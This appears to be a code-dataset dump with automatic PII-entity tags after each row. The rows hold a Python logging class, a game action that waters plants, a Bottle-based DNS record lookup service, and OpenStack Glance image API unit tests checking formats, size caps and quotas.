params=dict(default_params, **more_params)
),
timestamp,
stack_depth + 1
)
alert = alarm
@classmethod
def warning(
cls,
template,
default_params={},
cause=None,
stack_depth=0,
log_context=None,
**more_params
):
"""
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param cause: *Exception* for chaining
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: *any more parameters (which will overwrite default_params)
:return:
"""
timestamp = datetime.utcnow()
if not is_text(template):
Log.error("Log.warning was expecting a unicode template")
if isinstance(default_params, BaseException):
cause = default_params
default_params = {}
if "values" in more_params.keys():
Log.error("Can not handle a logging parameter by name `values`")
params = Data(dict(default_params, **more_params))
cause = unwraplist([Except.wrap(c) for c in listwrap(cause)])
trace = exceptions.get_stacktrace(stack_depth + 1)
e = Except(exceptions.WARNING, template=template, params=params, cause=cause, trace=trace)
Log._annotate(
e,
timestamp,
stack_depth+1
)
@classmethod
def error(
cls,
template, # human readable template
default_params={}, # parameters for template
        cause=None, # plausible cause
stack_depth=0,
**more_params
):
"""
raise an exception with a trace for the cause too
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param cause: *Exception* for chaining
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: *any more parameters (which will overwrite default_params)
:return:
"""
if not is_text(template):
sys.stderr.write(str("Log.error was expecting a unicode template"))
Log.error("Log.error was expecting a unicode template")
if default_params and isinstance(listwrap(default_params)[0], BaseException):
cause = default_params
default_params = {}
params = Data(dict(default_params, **more_params))
add_to_trace = False
if cause == None:
causes = None
elif is_list(cause):
causes = []
for c in listwrap(cause): # CAN NOT USE LIST-COMPREHENSION IN PYTHON3 (EXTRA STACK DEPTH FROM THE IN-LINED GENERATOR)
causes.append(Except.wrap(c, stack_depth=1))
causes = FlatList(causes)
elif isinstance(cause, BaseException):
causes = Except.wrap(cause, stack_depth=1)
else:
causes = None
Log.error("can only accept Exception, or list of exceptions")
trace = exceptions.get_stacktrace(stack_depth + 1)
if add_to_trace:
cause[0].trace.extend(trace[1:])
e = Except(context=exceptions.ERROR, template=template, params=params, cause=causes, trace=trace)
raise_from_none(e)
@classmethod
def _annotate(
cls,
item,
timestamp,
stack_depth
):
"""
        :param item: A LogItem, THE TYPE OF MESSAGE
:param stack_depth: FOR TRACKING WHAT LINE THIS CAME FROM
:return:
"""
item.timestamp = timestamp
item.machine = machine_metadata
item.template = strings.limit(item.template, 10000)
item.format = strings.limit(item.format, 10000)
if item.format == None:
format = text(item)
else:
format = item.format.replace("{{", "{{params.")
if not format.startswith(CR) and format.find(CR) > -1:
format = CR + format
if cls.trace:
log_format = item.format = "{{machine.name}} (pid {{machine.pid}}) - {{timestamp|datetime}} - {{thread.name}} - \"{{location.file}}:{{location.line}}\" - ({{location.method}}) - " + format
f = sys._getframe(stack_depth + 1)
item.location = {
"line": f.f_lineno,
"file": text(f.f_code.co_filename),
"method": text(f.f_code.co_name)
}
thread = _Thread.current()
item.thread = {"name": thread.name, "id": thread.id}
else:
log_format = item.format = "{{timestamp|datetime}} - " + format
cls.main_log.write(log_format, item.__data__())
def write(self):
raise NotImplementedError
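# A minimal usage sketch (assumed typical usage of the Log class above; the
# settings shown are illustrative, not the only valid shape):
#
#   Log.start({"trace": True, "log": {"log_type": "console"}})
#   Log.note("processed {{num}} records", num=42)
#   try:
#       risky_operation()  # hypothetical
#   except Exception as cause:
#       Log.warning("operation failed", cause=cause)
#   Log.stop()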
def _same_frame(frameA, frameB):
return (frameA.line, frameA.file) == (frameB.line, frameB.file)
# GET THE MACHINE METADATA
machine_metadata = wrap({
"pid": os.getpid(),
"python": text(platform.python_implementation()),
"os": text(platform.system() + platform.release()).strip(),
"name": text(platform.node())
})
def raise_from_none(e):
raise e
if PY3:
exec("def raise_from_none(e):\n raise e from None\n", globals(), locals())
from mo_logs.log_usingFile import StructuredLogger_usingFile
from mo_logs.log_usingMulti import StructuredLogger_usingMulti
from mo_logs.log_usingStream import StructuredLogger_usingStream
if not Log.main_log:
Log.main_log = StructuredLogger_usingStream(STDOUT)
| 15,833 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Kyle Lahnakoski'], ['NRP', 'FlatList'], ['PERSON', 'LogItem'], ['PERSON', 'cprofile - True==ENABLE'], ['DATE_TIME', '2018-09-02'], ['PERSON', 'mo_logs.log_usingThread'], ['LOCATION', 'main_log'], ['NRP', 'mo_logs.log_usingLogger'], ['LOCATION', 'OH'], ['PERSON', 'LogItem'], ['PERSON', 'LogItem'], ['NRP', 'Log.error("can'], ['PERSON', 'format.find(CR'], ['PERSON', 'same_frame(frameA'], ['URL', 'http://mozilla.org/MPL/2.0/.'], ['URL', 'http://victorlin.me/2012/08/good-logging-practice-in-python/'], ['URL', 'email.com'], ['URL', 'logs.st'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'Log.st'], ['URL', 'cls.se'], ['URL', 'cls.tr'], ['URL', 'settings.tr'], ['URL', 'cls.tr'], ['URL', 'settings.cprofile.fi'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'Log.er'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.co'], ['URL', 'constants.se'], ['URL', 'settings.co'], ['URL', 'Log.ad'], ['URL', 'Log.ne'], ['URL', 'cls.ma'], ['URL', 'cls.ma'], ['URL', 'cls.ma'], ['URL', 'log.st'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.st'], ['URL', 'settings.st'], ['URL', 'settings.st'], ['URL', 'Log.er'], ['URL', 'multi.ad'], ['URL', 'Log.er'], ['URL', 'Log.no'], ['URL', 'exceptions.NO'], ['URL', 'Log.er'], ['URL', 'params.ke'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'exceptions.AL'], ['URL', 'Log.er'], ['URL', 'params.ke'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'sys.st'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'exceptions.ER'], ['URL', 'item.ma'], ['URL', 'strings.li'], ['URL', 'item.fo'], ['URL', 'strings.li'], ['URL', 'item.fo'], ['URL', 'item.fo'], ['URL', 'item.format.re'], ['URL', 'format.st'], ['URL', 'format.fi'], ['URL', 'cls.tr'], ['URL', 'item.fo'], ['URL', 'machine.na'], ['URL', 'thread.na'], ['URL', 'location.fi'], ['URL', 'location.li'], ['URL', 'location.me'], ['URL', 'code.co'], ['URL', 'code.co'], ['URL', 'Thread.cu'], ['URL', 'item.th'], ['URL', 'thread.na'], ['URL', 'thread.id'], ['URL', 'item.fo'], ['URL', 'cls.ma'], ['URL', 'frameA.li'], ['URL', 'frameA.fi'], ['URL', 'frameB.li'], ['URL', 'frameB.fi'], ['URL', 'os.ge'], ['URL', 'platform.py'], ['URL', 'platform.sy'], ['URL', 'platform.re'], ['URL', 'platform.no'], ['URL', 'Log.ma'], ['URL', 'Log.ma']] |
21 | # This file is part of Beneath a Binary Sky.
# Copyright (C) 2016, Aidin Gharibnavaz dummy@email.com
#
# Beneath a Binary Sky is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Beneath a Binary Sky is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Beneath a Binary Sky. If not, see
# <http://www.gnu.org/licenses/>.
import time
from actions.action import Action
from actions.exceptions import InvalidArgumentsError, RobotHaveNoWaterError
from world.world import World
from database.exceptions import LockAlreadyAquiredError
class WaterAction(Action):
def __init__(self):
super().__init__()
self._world = World()
def do_action(self, robot, args):
'''Waters the square robot stands on.
@param robot: Instance of `objects.robot.Robot'.
'''
if len(args) != 1:
raise InvalidArgumentsError("`water' action takes no arguments.")
if not robot.get_has_water():
raise RobotHaveNoWaterError("Robot does not carry water.")
try:
square = self._world.get_square(robot.get_location(), for_update=True)
except LockAlreadyAquiredError:
# Waiting a little, and trying one more time.
time.sleep(0.02)
square = self._world.get_square(robot.get_location(), for_update=True)
# Note: we don't raise an exception if there's no plant. A robot can waste its water.
plant = square.get_plant()
if plant is not None:
plant.set_water_level(100)
robot.set_honor(robot.get_honor() + 1)
robot.set_has_water(False)
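# Illustrative call shape implied by the length check in do_action (robot is
# assumed to be an objects.robot.Robot instance; the single expected element
# of `args` is presumably the action name):
#
#   WaterAction().do_action(robot, ['water'])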
| 2,047 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016'], ['PERSON', 'Aidin Gharibnavaz'], ['DATE_TIME', 'RobotHaveNoWaterError("Robot'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'actions.ac'], ['URL', 'objects.robot.Ro'], ['URL', 'robot.ge'], ['URL', 'world.ge'], ['URL', 'robot.ge'], ['URL', 'time.sl'], ['URL', 'world.ge'], ['URL', 'robot.ge'], ['URL', 'square.ge'], ['URL', 'plant.se'], ['URL', 'robot.se'], ['URL', 'robot.ge'], ['URL', 'robot.se']] |
22 | #!/usr/bin/env python3
import os, logging, argparse, json, datetime
import requests
import dns.resolver
from bottle import route, request, response, redirect, hook, error, default_app, view, static_file, template
def set_content_type(fn):
def _return_type(*args, **kwargs):
if request.headers.get('Accept') == "application/json":
response.headers['Content-Type'] = 'application/json'
if request.headers.get('Accept') == "text/plain":
response.headers['Content-Type'] = 'text/plain'
if request.method != 'OPTIONS':
return fn(*args, **kwargs)
return _return_type
def enable_cors(fn):
def _enable_cors(*args, **kwargs):
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS'
response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'
if request.method != 'OPTIONS':
return fn(*args, **kwargs)
return _enable_cors
def resolveDomain(domain, recordType, args):
records = []
if args.doh:
try:
payload = {
'name': domain,
'type': recordType
}
data = requests.get("{}".format(args.resolver), params=payload)
for rec in data.json()['Answer']:
records.append(rec['data'])
except:
return records
return records
else:
try:
resolver = dns.resolver.Resolver()
resolver.nameservers = args.resolver.split(',')
if recordType in args.records.split(','):
lookup = resolver.resolve(domain, recordType)
for data in lookup:
if recordType in ['A', 'AAAA']:
records.append(data.address)
elif recordType in ['TXT']:
for rec in data.strings:
records.append(rec.decode("utf-8").replace('"', '').strip())
else:
records.append(str(data).replace('"', '').strip())
return records
except dns.resolver.NXDOMAIN:
return records
except dns.resolver.NoAnswer:
return records
except dns.exception.Timeout:
return records
except dns.resolver.NoNameservers:
return records
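# Example direct use (assumes argparse args are already parsed; the returned
# records depend on the resolver in use, e.g.):
#   resolveDomain("example.com", "A", args)  # -> a list like ['93.184.216.34']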
@error('404')
@error('403')
def returnError(code, msg, contentType="text/plain"):
response.status = int(code)
response.content_type = contentType
return template('error')
@route('/static/<filepath:path>')
def static(filepath):
return static_file(filepath, root='views/static')
@route('/servers')
def servers():
try:
response.content_type = 'text/plain'
return "\r\n".join(args.resolver.split(","))
except:
return "Unable to open servers file."
@route('/version')
def version():
try:
dirname, filename = os.path.split(os.path.abspath(__file__))
del filename
f = open(os.getenv('VERSION_PATH', dirname + '/.git/refs/heads/master'), 'r')
content = f.read()
response.content_type = 'text/plain'
return content
except:
return "Unable to open version file."
@route('/<record>')
def route_redirect(record):
return redirect("/{}/A".format(record))
@route('/<record>/<type>')
@route('/<record>/<type>.<ext>')
@set_content_type
@enable_cors
def loadRecord(record, type='A', ext='html'):
try:
if record == "":
raise ValueError
        if ext not in ("html", "txt", "text", "json"):
raise ValueError
        if type.upper() not in args.records.split(','):
raise ValueError
except ValueError:
return returnError(404, "Not Found", "text/html")
if ext in ["json"]:
response.content_type = 'application/json'
if ext in ["txt", "text"]:
response.content_type = 'text/plain'
    # Resolve the requested record using the configured resolver
data = resolveDomain(record, type.upper(), args)
if response.content_type == 'application/json':
return json.dumps({
'results': {
'name': record,
'type': type.upper(),
'records': data,
}
})
elif response.content_type == "text/plain":
return "\r\n".join(data)
else:
return template('rec', {
'name': record,
'type': type.upper(),
'records': data,
'recTypes': args.records.split(',')
})
@route('/', ('GET', 'POST'))
def index():
if request.method == "POST":
recordName = request.forms.get('recordName', '')
recordType = request.forms.get('recordType', '')
if recordName != '' and recordType in args.records.split(','):
return redirect("/{}/{}".format(recordName, recordType))
else:
return returnError(404, "We were not able to figure out what you were asking for", "text/html")
return template("home", {
'recTypes': args.records.split(',')
})
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Server settings
parser.add_argument("-i", "--host", default=os.getenv('HOST', '127.0.0.1'), help="server ip")
parser.add_argument("-p", "--port", default=os.getenv('PORT', 5000), help="server port")
# Redis settings
parser.add_argument("--redis", default=os.getenv('REDIS', 'redis://localhost:6379/0'), help="redis connection string")
# Application settings
parser.add_argument("--doh", help="use DNS-over-HTTPS and treat --resolver as DNS-over-HTTPS capable (beta)", action="store_true")
parser.add_argument("--records", default=os.getenv('RECORDS', "A,AAAA,CAA,CNAME,DS,DNSKEY,MX,NS,NSEC,NSEC3,RRSIG,SOA,TXT"), help="supported records")
parser.add_argument("--resolver", default=os.getenv('RESOLVER', '127.0.0.1'), help="resolver address")
# Verbose mode
parser.add_argument("--verbose", "-v", help="increase output verbosity", action="store_true")
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
try:
app = default_app()
app.run(host=args.host, port=args.port, server='tornado')
except:
log.error("Unable to start server on {}:{}".format(args.host, args.port)) | 5,656 | [['LOCATION', 'json'], ['LOCATION', 'fn(*args'], ['LOCATION', 'fn(*args'], ['PERSON', 'NoAnswer'], ['PERSON', 'dirname'], ['PERSON', 'dirname'], ['PERSON', "@route('/"], ['LOCATION', 'DNSKEY'], ['PERSON', 'help="resolver'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'dns.re'], ['URL', 'request.headers.ge'], ['URL', 'request.headers.ge'], ['URL', 'request.me'], ['URL', 'request.me'], ['URL', 'args.do'], ['URL', 'requests.ge'], ['URL', 'args.re'], ['URL', 'dns.resolver.Re'], ['URL', 'resolver.na'], ['URL', 'args.re'], ['URL', 'args.re'], ['URL', 'resolver.re'], ['URL', 'data.ad'], ['URL', 'data.st'], ['URL', 'rec.de'], ['URL', 'dns.re'], ['URL', 'dns.resolver.No'], ['URL', 'dns.resolver.No'], ['URL', 'response.st'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'request.me'], ['URL', 'request.forms.ge'], ['URL', 'request.forms.ge'], ['URL', 'args.re'], ['URL', 'args.re'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.ve'], ['URL', 'logging.ba'], ['URL', 'logging.DE'], ['URL', 'logging.ba'], ['URL', 'logging.IN'], ['URL', 'logging.ge'], ['URL', 'app.ru'], ['URL', 'log.er']] |
23 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# -*- coding: utf-8 -*-
# Copyright 2010-2011 OpenStack, LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import hashlib
import json
import StringIO
from oslo.config import cfg
import routes
import six
import webob
import glance.api
import glance.api.common
from glance.api.v1 import filters
from glance.api.v1 import images
from glance.api.v1 import router
from glance.common import exception
import glance.common.config
import glance.context
from glance.db.sqlalchemy import api as db_api
from glance.db.sqlalchemy import models as db_models
from glance.openstack.common import timeutils
from glance.openstack.common import uuidutils
import glance.store.filesystem
from glance.tests.unit import base
from glance.tests import utils as test_utils
import glance.tests.unit.utils as unit_test_utils
CONF = cfg.CONF
_gen_uuid = uuidutils.generate_uuid
UUID1 = _gen_uuid()
UUID2 = _gen_uuid()
class TestGlanceAPI(base.IsolatedUnitTest):
def setUp(self):
"""Establish a clean test environment"""
super(TestGlanceAPI, self).setUp()
self.mapper = routes.Mapper()
self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper))
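        # Seed data: UUID1 is a private ami kernel image; UUID2 is a public
        # vhd/ovf image. Both point at files created under self.test_dir.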
self.FIXTURES = [
{'id': UUID1,
'name': 'fake image #1',
'status': 'active',
'disk_format': 'ami',
'container_format': 'ami',
'is_public': False,
'created_at': timeutils.utcnow(),
'updated_at': timeutils.utcnow(),
'deleted_at': None,
'deleted': False,
'checksum': None,
'size': 13,
'locations': [{'url': "file:///%s/%s" % (self.test_dir, UUID1),
'metadata': {}}],
'properties': {'type': 'kernel'}},
{'id': UUID2,
'name': 'fake image #2',
'status': 'active',
'disk_format': 'vhd',
'container_format': 'ovf',
'is_public': True,
'created_at': timeutils.utcnow(),
'updated_at': timeutils.utcnow(),
'deleted_at': None,
'deleted': False,
'checksum': 'abc123',
'size': 19,
'locations': [{'url': "file:///%s/%s" % (self.test_dir, UUID2),
'metadata': {}}],
'properties': {}}]
self.context = glance.context.RequestContext(is_admin=True)
db_api.setup_db_env()
db_api.get_engine()
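        # Reset persistent state between tests: drop and recreate the
        # models, then reseed the two fixture images.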
self.destroy_fixtures()
self.create_fixtures()
def tearDown(self):
"""Clear the test environment"""
super(TestGlanceAPI, self).tearDown()
self.destroy_fixtures()
def create_fixtures(self):
for fixture in self.FIXTURES:
db_api.image_create(self.context, fixture)
# We write a fake image file to the filesystem
with open("%s/%s" % (self.test_dir, fixture['id']), 'wb') as image:
image.write("chunk00000remainder")
image.flush()
def destroy_fixtures(self):
# Easiest to just drop the models and re-create them...
db_models.unregister_models(db_api._ENGINE)
db_models.register_models(db_api._ENGINE)
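    # Helper: POST an image with only one of the two format headers set and
    # verify the other format defaults to the same value (amazon-style
    # aki/ari/ami images must have matching disk and container formats).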
def _do_test_defaulted_format(self, format_key, format_value):
fixture_headers = {'x-image-meta-name': 'defaulted',
'x-image-meta-location': 'http://localhost:0/image',
format_key: format_value}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals(format_value, res_body['disk_format'])
self.assertEquals(format_value, res_body['container_format'])
def test_defaulted_amazon_format(self):
for key in ('x-image-meta-disk-format',
'x-image-meta-container-format'):
for value in ('aki', 'ari', 'ami'):
self._do_test_defaulted_format(key, value)
def test_bad_disk_format(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'invalid',
'x-image-meta-container-format': 'ami',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid disk format' in res.body, res.body)
def test_configured_disk_format_good(self):
self.config(disk_formats=['foo'])
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'foo',
'x-image-meta-container-format': 'bare',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_configured_disk_format_bad(self):
self.config(disk_formats=['foo'])
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'bar',
'x-image-meta-container-format': 'bare',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid disk format' in res.body, res.body)
def test_configured_container_format_good(self):
self.config(container_formats=['foo'])
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'raw',
'x-image-meta-container-format': 'foo',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_configured_container_format_bad(self):
self.config(container_formats=['foo'])
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'raw',
'x-image-meta-container-format': 'bar',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid container format' in res.body, res.body)
def test_container_and_disk_amazon_format_differs(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'aki',
'x-image-meta-container-format': 'ami'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
expected = ("Invalid mix of disk and container formats. "
"When setting a disk or container format to one of "
"'aki', 'ari', or 'ami', "
"the container and disk formats must match.")
self.assertEquals(res.status_int, 400)
self.assertTrue(expected in res.body, res.body)
def test_create_with_location_no_container_format(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'vhd',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid container format' in res.body)
def test_bad_container_format(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://localhost:0/image.tar.gz',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'invalid',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Invalid container format' in res.body)
def test_bad_image_size(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'bogus',
'x-image-meta-location': 'http://example.com/image.tar.gz',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-size': 'invalid',
'x-image-meta-container-format': 'bare',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
self.assertTrue('Incoming image size' in res.body)
def test_bad_image_name(self):
fixture_headers = {
'x-image-meta-store': 'bad',
'x-image-meta-name': 'X' * 256,
'x-image-meta-location': 'http://example.com/image.tar.gz',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'bare',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_no_location_no_image_as_body(self):
"""Tests creates a queued image for no body and no loc header"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
image_id = res_body['id']
# Test that we are able to edit the Location field
# per LP Bug #911599
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['x-image-meta-location'] = 'http://localhost:0/images/123'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_body = json.loads(res.body)['image']
# Once the location is set, the image should be activated
# see LP Bug #939484
self.assertEquals('active', res_body['status'])
self.assertFalse('location' in res_body) # location never shown
def test_add_image_no_location_no_content_type(self):
"""Tests creates a queued image for no body and no loc header"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = "chunk00000remainder"
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_size_header_too_big(self):
"""Tests raises BadRequest for supplied image size that is too big"""
fixture_headers = {'x-image-meta-size': CONF.image_size_cap + 1,
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_size_chunked_data_too_big(self):
self.config(image_size_cap=512)
fixture_headers = {
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'ami',
'x-image-meta-disk_format': 'ami',
'transfer-encoding': 'chunked',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body_file = StringIO.StringIO('X' * (CONF.image_size_cap + 1))
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
def test_add_image_size_data_too_big(self):
self.config(image_size_cap=512)
fixture_headers = {
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'ami',
'x-image-meta-disk_format': 'ami',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = 'X' * (CONF.image_size_cap + 1)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_add_image_size_header_exceed_quota(self):
quota = 500
self.config(user_storage_quota=quota)
fixture_headers = {'x-image-meta-size': quota + 1,
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'bare',
'x-image-meta-disk_format': 'qcow2',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.body = 'X' * (quota + 1)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
def test_add_image_size_data_exceed_quota(self):
quota = 500
self.config(user_storage_quota=quota)
fixture_headers = {
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'bare',
'x-image-meta-disk_format': 'qcow2',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = 'X' * (quota + 1)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
def test_add_image_size_data_exceed_quota_readd(self):
quota = 500
self.config(user_storage_quota=quota)
fixture_headers = {
'x-image-meta-name': 'fake image #3',
'x-image-meta-container_format': 'bare',
'x-image-meta-disk_format': 'qcow2',
'content-type': 'application/octet-stream',
}
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = 'X' * (quota + 1)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
used_size = sum([f['size'] for f in self.FIXTURES])
req = webob.Request.blank("/images")
req.method = 'POST'
req.body = 'X' * (quota - used_size)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def _add_check_no_url_info(self):
fixture_headers = {'x-image-meta-disk-format': 'ami',
'x-image-meta-container-format': 'ami',
'x-image-meta-size': '0',
'x-image-meta-name': 'empty image'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
res_body = json.loads(res.body)['image']
self.assertFalse('locations' in res_body)
self.assertFalse('direct_url' in res_body)
image_id = res_body['id']
# HEAD empty image
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertFalse('x-image-meta-locations' in res.headers)
self.assertFalse('x-image-meta-direct_url' in res.headers)
def test_add_check_no_url_info_ml(self):
self.config(show_multiple_locations=True)
self._add_check_no_url_info()
def test_add_check_no_url_info_direct_url(self):
self.config(show_image_direct_url=True)
self._add_check_no_url_info()
def test_add_check_no_url_info_both_on(self):
self.config(show_image_direct_url=True)
